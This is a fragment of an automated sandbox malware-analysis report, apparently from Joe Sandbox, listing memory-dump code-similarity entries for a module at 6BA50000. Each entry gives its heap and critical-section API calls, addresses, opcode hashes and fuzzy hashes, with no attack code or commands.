                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                                      • Opcode ID: 655a11b154765021fb494f595cb8f85c86f4965874d7de8f68acde5f81d2570e
                                                                                                                                                                                                                                      • Instruction ID: b782bcda1dce61d35d68d96dea1a6523e0e1b5dc283d2c9c66e0c73f4fbddf0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 655a11b154765021fb494f595cb8f85c86f4965874d7de8f68acde5f81d2570e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D41FEB16542169FEF14CF68D88036A77B2EB45704F28493EC516EB340E736E981CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BAB61DD
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BAB622C
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BAB6250
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BAB6292
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                                      • Opcode ID: 27c5d1685e3960afea12c49e66067fb5550657fc7c3b5457e1641b926043e08b
                                                                                                                                                                                                                                      • Instruction ID: af618185b0fc2efbad492e67a8cfcb1f938e52d8fcee3bca3e0dcbcd76aa9e79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27c5d1685e3960afea12c49e66067fb5550657fc7c3b5457e1641b926043e08b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC310871A0460A8FEF04CF2CD8806AAB3E9FB95304F14857AC56AD7351FB35E698C750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BBF4
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BC66
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BA6BC96
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BA6BCCE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                                      • Opcode ID: c4573db95fd13d225a38a44dda9e4c7c0d5f03a1428fed77abee615a6abb92ae
                                                                                                                                                                                                                                      • Instruction ID: f2d981a612906ba136ce1d16346c338cb6470e822410e41f07aa81392866264e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4573db95fd13d225a38a44dda9e4c7c0d5f03a1428fed77abee615a6abb92ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 062128F1A002059BFB008F3DCC8666E72E5EB89384F948B39E956D6351FE74E6C48351
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE744,6BAB7765,00000000,6BAB7765,?,6BA76112), ref: 6BA539AF
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE744,?,6BA76112), ref: 6BA53A34
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADE784,6BA76112), ref: 6BA53A4B
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA53A5F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                                      • Opcode ID: c0b86525775492fe6b743f380ca34f5c6571d8239c77e3e48a02fc42c8101867
                                                                                                                                                                                                                                      • Instruction ID: 1e340c73f332fb2259ebffbcc7e4dd1c58ce2206faa98b63d353dc20facb1822
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0b86525775492fe6b743f380ca34f5c6571d8239c77e3e48a02fc42c8101867
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE212772709B018FCF249F79C455A2AB3E1FFC5750718462DD5A683B80EB39E982CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6BA6B96F
                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6BA6B99A
                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BA6B9B0
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA6B9B9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3313557100-0
                                                                                                                                                                                                                                      • Opcode ID: 6492d68ae231508750e1bfa28e5f06a102cf5b193d6b34c4321f7b492df27d90
                                                                                                                                                                                                                                      • Instruction ID: f08a4453377771aa5fe02e89c5ccec432783506cd60abff3575723147d438fd0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6492d68ae231508750e1bfa28e5f06a102cf5b193d6b34c4321f7b492df27d90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C61142F1A042059FCB04CF69D88189FB7F9BF98254B14893AE919D3301E735E955CAA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%